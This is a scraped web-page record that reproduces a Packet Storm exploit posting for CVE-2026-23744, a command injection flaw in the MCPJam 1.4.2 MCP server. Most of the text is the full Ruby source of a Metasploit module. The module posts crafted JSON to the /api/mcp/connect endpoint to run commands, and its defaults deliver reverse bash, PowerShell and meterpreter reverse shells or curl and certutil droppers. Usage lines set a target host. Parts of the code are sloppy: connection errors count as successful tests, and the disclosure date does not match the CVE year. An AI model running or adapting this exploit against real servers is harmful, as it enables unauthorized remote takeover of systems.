{“lastseen”:”2026-01-27T17:13:58″,”description”:”This Metasploit exploit module targets the MCP Model Context Protocol server, specifically exploiting a command injection vulnerability in the \/api\/mcp\/connect endpoint. The vulnerability allows unauthorized remote command execution by sending crafted…”,”published”:”2026-01-27T00:00:00″,”modified”:”2026-01-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MCPJam 1.4.2 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214431″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-23744″],”sourceData”:”=============================================================================================================================================\\n | # Title : MCPJam 1.4.2 command injection vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/github.com\/MCPJam |\\n =============================================================================================================================================\\n \\n [+] References: https:\/\/packetstorm.news\/files\/id\/214283\/ \\u0026 CVE-2026-23744\\n \\n [+] Summary: This Metasploit exploit module targets the MCP (Model Context Protocol) server, specifically exploiting a command injection vulnerability in the \/api\/mcp\/connect endpoint. \\n The vulnerability allows unauthorized remote command execution by sending crafted JSON payloads that are executed by the server without proper sanitization.\\n \\n [+] Platforms Supported: Unix\/Linux and Windows\\n \\n [+] Payload Types:\\n \\n Command execution (ARCH_CMD)\\n \\n Dropper payloads for Linux and Windows (ARCH_X64)\\n \\n [+] Functionality:\\n \\n Check if the target server is reachable and running MCP\\n \\n Test the server for RCE vulnerability using safe commands\\n \\n Exploit the server via command payloads or staged droppers\\n \\n [+] Robustness:\\n \\n Handles connection errors, timeouts, and server readiness\\n \\n Supports verbose output for debugging and test confirmation\\n \\n [+] Metasploit Integration:\\n \\n Compatible with Msf::Exploit::Remote::HttpClient and CmdStager\\n \\n Provides multiple targets and configurable options (RPORT, TARGETURI, WAIT_TIMEOUT, VERBOSE)\\n \\n [+] Usage :\\n \\n use exploit\/multi\/mcp_rce\\n set RHOSTS 192.168.1.100\\n set RPORT 6274\\n set TARGETURI \/\\n run\\n \\n [+] Notes:\\n \\n The module does not require privileged access\\n \\n Exploitation may leave artifacts on disk or logs\\n \\n Safe for testing, but ensure authorization before use\\n \\n [+] POC :\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘MCP Server Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a command injection vulnerability in the MCP\\n (Model Context Protocol) server. The vulnerability exists in the\\n \/api\/mcp\/connect endpoint which allows unauthorized remote command\\n execution.\\n \\n The server runs on port 6274 by default and accepts JSON payloads\\n that are passed directly to system() calls or similar execution\\n functions without proper sanitization.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/packetstorm.news\/files\/id\/214283\/’],\\n [‘CVE’, ‘\\tCVE-2026-23744’] \\n ],\\n ‘Platform’ =\\u003e %w[unix linux win],\\n ‘Arch’ =\\u003e [ARCH_CMD, ARCH_X86, ARCH_X64],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux (CMD)’,\\n {\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’ },\\n ‘Type’ =\\u003e :cmd\\n }\\n ],\\n [\\n ‘Windows (CMD)’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘cmd\/windows\/powershell_reverse_tcp’ },\\n ‘Type’ =\\u003e :cmd\\n }\\n ],\\n [\\n ‘Linux (Dropper)’,\\n {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e ARCH_X64,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’ },\\n ‘Type’ =\\u003e :dropper\\n }\\n ],\\n [\\n ‘Windows (Dropper)’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_X64,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘windows\/x64\/meterpreter\/reverse_tcp’ },\\n ‘Type’ =\\u003e :dropper\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2024-01-01’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options([\\n Opt::RPORT(6274),\\n OptString.new(‘TARGETURI’, [true, ‘The base path to MCP server’, ‘\/’]),\\n OptInt.new(‘WAIT_TIMEOUT’, [true, ‘Seconds to wait for server’, 30]),\\n OptBool.new(‘VERBOSE’, [false, ‘Enable verbose output’, false])\\n ])\\n end\\n \\n def check\\n vprint_status(\\”Checking if target #{peer} is running MCP server…\\”)\\n \\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path)\\n })\\n rescue ::Rex::ConnectionError\\n return Exploit::CheckCode::Safe(\\”Connection failed\\”)\\n end\\n \\n unless res\\n return Exploit::CheckCode::Safe(\\”No response received\\”)\\n end\\n \\n if res.code == 200 || res.code \\u003c 500\\n vprint_good(\\”Server responded with code #{res.code}\\”)\\n \\n if test_vulnerability\\n return Exploit::CheckCode::Vulnerable(\\”Confirmed RCE vulnerability\\”)\\n else\\n return Exploit::CheckCode::Appears(\\”Server appears to be MCP but RCE not confirmed\\”)\\n end\\n end\\n \\n Exploit::CheckCode::Safe(\\”Does not appear to be MCP server\\”)\\n end\\n \\n def exploit\\n print_status(\\”Starting exploitation of #{peer}…\\”)\\n \\n unless check_server\\n fail_with(Failure::Unknown, \\”Server not reachable\\”)\\n end\\n \\n case target[‘Type’]\\n when :cmd\\n exploit_cmd\\n when :dropper\\n exploit_dropper\\n else\\n fail_with(Failure::NoTarget, \\”Invalid target type selected\\”)\\n end\\n end\\n \\n private\\n \\n def check_server\\n print_status(\\”Waiting for server on #{peer}…\\”)\\n \\n start_time = Time.now\\n max_wait = datastore[‘WAIT_TIMEOUT’]\\n \\n while Time.now – start_time \\u003c max_wait\\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘timeout’ =\\u003e 2\\n })\\n \\n if res \\u0026\\u0026 res.code \\u003c 500\\n print_good(\\”Server ready after #{Time.now – start_time:.2f} seconds\\”)\\n return true\\n end\\n rescue ::Rex::ConnectionError\\n \\n rescue ::Rex::TimeoutError\\n \\n end\\n \\n Rex.sleep(1)\\n end\\n \\n print_error(\\”Server failed to start within #{max_wait} seconds\\”)\\n false\\n end\\n \\n def test_vulnerability\\n vprint_status(\\”Testing vulnerability…\\”)\\n \\n test_commands = [\\n \\”echo MSF_TEST_#{Rex::Text.rand_text_alpha(8)}\\”,\\n \\”printf VULN_TEST\\”,\\n \\”ver\\”\\n ]\\n \\n successful_tests = 0\\n \\n test_commands.each do |cmd|\\n vprint_status(\\”Testing command: #{cmd}\\”)\\n payload = create_payload(cmd)\\n \\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘mcp’, ‘connect’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload.to_json\\n })\\n \\n if res\\n vprint_good(\\”Command #{cmd} sent successfully (status: #{res.code})\\”)\\n successful_tests += 1\\n else\\n vprint_warning(\\”No response for command: #{cmd}\\”)\\n end\\n rescue ::Rex::ConnectionError\\n vprint_warning(\\”Connection error for command: #{cmd}\\”)\\n \\n successful_tests += 1\\n end\\n \\n Rex.sleep(0.5)\\n end\\n \\n is_vulnerable = successful_tests \\u003e 0\\n vprint_status(\\”Vulnerability test result: #{successful_tests}\/#{test_commands.length} successful\\”)\\n is_vulnerable\\n end\\n \\n def create_payload(command)\\n \\n if target[‘Platform’] == ‘unix’ || target[‘Platform’] == ‘linux’\\n cmd_parts = Shellwords.split(command)\\n cmd = cmd_parts[0]\\n args = cmd_parts[1..-1] || []\\n \\n env_vars = {\\n ‘PATH’ =\\u003e ‘\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin’,\\n ‘SHELL’ =\\u003e ‘\/bin\/bash’\\n }\\n else\\n \\n cmd = ‘cmd.exe’\\n args = [‘\/c’, command]\\n env_vars = {}\\n end\\n \\n {\\n ‘serverConfig’ =\\u003e {\\n ‘command’ =\\u003e cmd,\\n ‘args’ =\\u003e args,\\n ‘env’ =\\u003e env_vars\\n },\\n ‘serverId’ =\\u003e \\”msf_#{Rex::Text.rand_text_alphanumeric(8)}\\”\\n }\\n end\\n \\n def exploit_cmd\\n print_status(\\”Exploiting with command payload…\\”)\\n \\n case target[‘Platform’]\\n when ‘unix’, ‘linux’\\n cmd = payload.encoded\\n when ‘win’\\n cmd = payload.encoded\\n end\\n \\n payload_data = create_payload(cmd)\\n \\n print_status(\\”Sending payload to #{peer}…\\”)\\n \\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘mcp’, ‘connect’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload_data.to_json\\n })\\n \\n if res\\n print_status(\\”Server responded with status: #{res.code}\\”)\\n \\n if res.body \\u0026\\u0026 !res.body.empty?\\n vprint_status(\\”Response body: #{res.body[0..500]}\\”)\\n end\\n else\\n print_warning(\\”No response received – exploitation may have succeeded\\”)\\n end\\n \\n Rex.sleep(2)\\n \\n print_good(\\”Exploitation completed\\”)\\n \\n rescue ::Rex::ConnectionError =\\u003e e\\n print_warning(\\”Connection error: #{e.message}\\”)\\n print_warning(\\”This may indicate successful exploitation\\”)\\n rescue ::Rex::TimeoutError\\n print_error(\\”Request timeout\\”)\\n end\\n end\\n \\n def exploit_dropper\\n print_status(\\”Exploiting with dropper payload…\\”)\\n \\n case target[‘Platform’]\\n when ‘linux’\\n execute_cmdstager(\\n flavor: :curl,\\n linemax: 2048\\n )\\n when ‘win’\\n execute_cmdstager(\\n flavor: :certutil,\\n linemax: 2048\\n )\\n end\\n end\\n \\n def execute_command(cmd, opts = {})\\n vprint_status(\\”Executing command: #{cmd}\\”)\\n \\n payload_data = create_payload(cmd)\\n \\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘mcp’, ‘connect’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e payload_data.to_json,\\n ‘timeout’ =\\u003e 10\\n })\\n \\n if res \\u0026\\u0026 datastore[‘VERBOSE’]\\n vprint_status(\\”Command response: #{res.code}\\”)\\n end\\n \\n rescue ::Rex::ConnectionError\\n vprint_warning(\\”Connection error during command execution\\”)\\n rescue ::Rex::TimeoutError\\n vprint_warning(\\”Timeout during command execution\\”)\\n end\\n \\n nil\\n end\\n end\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214431″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214431\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-27T17:13:58″,”description”:”This Metasploit exploit module targets the MCP Model Context Protocol server, specifically exploiting a command injection vulnerability in the \/api\/mcp\/connect endpoint. The vulnerability allows unauthorized…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-37575","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n